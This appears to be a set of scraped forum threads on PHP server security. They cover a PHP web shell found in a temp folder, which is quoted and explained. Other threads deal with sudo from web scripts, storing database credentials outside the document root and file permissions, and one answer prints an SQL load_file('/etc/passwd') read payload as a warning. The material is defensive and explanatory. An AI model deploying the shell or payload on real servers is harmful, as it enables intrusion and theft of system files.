I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp
Looking into the contents I find a number followed by some PHP code, the following code appears in several files
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); #eval("\$safedg = $xsser;"); } ?>
This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.
Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?
I don't know if it is relevant but we are running PHP 5.5 on IIS
Short story: your server may have already been compromised.
Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.
The key parts to understanding the shell are:
$xsser=base64_decode($_POST['z0']);
#eval("\$safedg = $xsser;");
It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.
It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.
So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.
Related
I have a REALLY strange thing happening! When I view a file (within the "Program Files (x86)" folder tree) in my file manager it has one content, but when I retrieve it through PHP CLI script using file_get_contents() it has different content (with some additional lines I added through the script earlier) - except if I run the CLI script in a prompt with admin rights, then I see the same content. How on earth is it possible that the same file can have different content based on the permissions of the user accessing the file? Is that really possible, and if so where can I find more information on how it works? I've never heard of such a thing in my 25+ years of computing and programming experience...
I have quatro-checked that the path is the same and checked in all kinds of ways that there isn't something else playing a trick on me - but I just can't find any possible explanations!
I'm running Windows 10.
32-bit applications that do not have a requestedExecutionLevel node in their manifest are assumed to be UAC-unaware and if they try to write to a privileged location in the file system or registry (when the process is not elevated) the write operation is virtualized. Virtualized files are stored in %LocalAppData%\VirtualStore.
Manually delete the file in the virtual store and then edit the ACL/security of the file if you need to write to it from your script as a standard user...
I have a script write_get.php that I would like to execute via users remotely loading a web page. This script in turn runs
exec("sudo php save_file.php ".$arg1)
to do some file writing that requires sudo permissions. This works fine when I run write_get.php from the command line on my web server as a non-privileged user, but it doesn't work fine when I invoke the script by loading it in a web browser. The web browser presents the same message, making it appear as though there is no error, but the file created by save_file.php is never created. Everything else that needs to happen (another temp file creation that doesn't require sudo + a database insert) work fine, but everything else is in write_get rather than in the sudo-requiring save_file.
I assume the server somehow blocks this call to exec("sudo... when it's made remotely? Or if not, what's happening here? Most importantly, how can I work around this?
p.s. I understand there are probably major security concerns here, but please know there is no sensitive data/anything on this server and that the files created in the sudo-requiring script don't even contain user input, so for the moment I am more concerned with trying to do the above than with creating a safer file structure/alternate way of doing this.
What you're trying to do is a bad idea because you would need to give paswordless root access to the Apache user, which is essentially like making the Apache user equal to root. All it would take to gain root access to your server would be to upload a malicious PHP script and have that script executed by the Apache user. Instead just make the files you are writing to writable by the Apache user by executing:
chown -R www-data:www:data /var/www/html
And then instead of doing exec() just include the other PHP file in your main script.
I was reading some posts about how to include files outside php root (Apache root). I guess only reading a file is a easier task, may be done with the same solution. But I do not intent to put php or any other script file outside my document root (right now is /Library/WebServer/Documents/), I wish to keep only one root with usual configurations.
But any file outside root is not "visible", it's like my all HD were made just by the root. Php did not return permissions error, it returns file don't exists (or is not a directory error). Is a good security practice, but make my scripts blind! I have a small Intranet an one task I wish to do is to read Safari's favorites file (Bookmarks.plist), also I wish to make a photo viewer, etc.
So I just want to read those files. Is there some hack for this?
EDIT: I was using file_get_contents. Following suggestions, I tried include that stops in permissions issues (probably owner issue). I did a test with a simple file in a Volume (an external HD) and it included just fine. However, I'm thinking in how to deal with data, you know, I was expecting to read the XML to work on it...
EDIT 2: file_get_contents is working with a file in an external HD, so the problem seams to be about permissions/owner file. The info window shows the same users for both files: me, staff and everyone with at least read permission. Maybe there is some "hidden" user... any hacker around?
In a module I'm creating I have some sensitive information I need to store securely: A remote database host, username, and password.
It seems that the only storage available is in the Drupal database, which worries me since this means if Drupal is compromised so is this other database. The settings.php file in sites/all/default was my second option, but I'm having trouble writing to it. Various chmod commands in FTP and SSH to 777 and 666 won't open the file to writing. I'm also not sure if the variables I set there are available anywhere else.
Are there any other ways to store this information securely?
You're on the right track using settings.php. You can use the $conf variable in settings.php to set variables that you can access in modules using variable_get.
Hmmm... this seems like something you shouldn't do in general. Write an API that sits at the remote database that you can access.
If however you insist on direct database access. Hard code the host, username and password in a file, put the file outside your document root and include it from there. For example, if your document root (i.e. where Drupal's index.php file is) was /www/htdocs, put a file containing the info at something like /www/secure and include it where you need it. Then if php stops working for some reason, the file isn't in a readable location to the outside world but PHP can include it within the site as necessary.
Sure somebody might see that you were including the file but they wouldn't be able to see the file itself unless they hacked your server (rather than just Drupal) and in that situation, your pretty much screwed anyway.
Using a config file is ideal for this type of information. However doing a chmod 777 or 666 is a really bad idea. The problem is that both of these settings allow the file GLOBALLY read/write. So if you are on a shared host, then its possible for another user on the system to access your file. On install trying using php's chmod() function to do a chmod 500 on the file. (500 should work in most cases, the most important part is that the last number is zero).
I've got a "globabVars.php" doc in my own little framework that contains database connection vars etc... I'm thinking would be neat to store outside of the web facing directories to keep it a little more secure. But, then I was thinking, is it really THAT much more secure? I mean, if someone were able to look at my .php files as a whole (without the server processing them) they would be INSIDE my server looking at all my files anyway...
Thoughts?
Moving a config file outside of the web root can prevent this file from getting leaked if you accidentally mis-configure apache. For instance if you remove Apache's mod_php then all .php files will be treated as text files. I have seen config files moved outside of the web root on production systems for this reason, and it did stop the file from getting leaked! (An admin iced the config during an update, doah!). Although this doesn't happen very often.
If an attacker can control the path of one of these functions: file_get_contents(), fopen(), readfile() or fgets() then he can read any file on your system. You also have to worry about sql injection. For instance this query under MySQL can be used to read files: select load_file("/etc/passwd").
To mitigate this issue, remove FILE privileges from your MySQL user account that PHP uses. Also do a chmod 500 -R /path/to/web/root, The last 2 zeros keeps any other account from accessing the files. You should also follow it up with a chown www-data -R /path/to/web/root where www-data is the user account that php is executed as, you can figure this out by doing a <?php system('whoami');?>.
It means noone can access it via a URL by default.
You can hide with .htaccess if it is in your docroot, but storing it above the docroot is just that bit safer.
You can have it read via PHP if your application is prone to directory traversal attacks.
Yeah, you are right. There is a very small difference.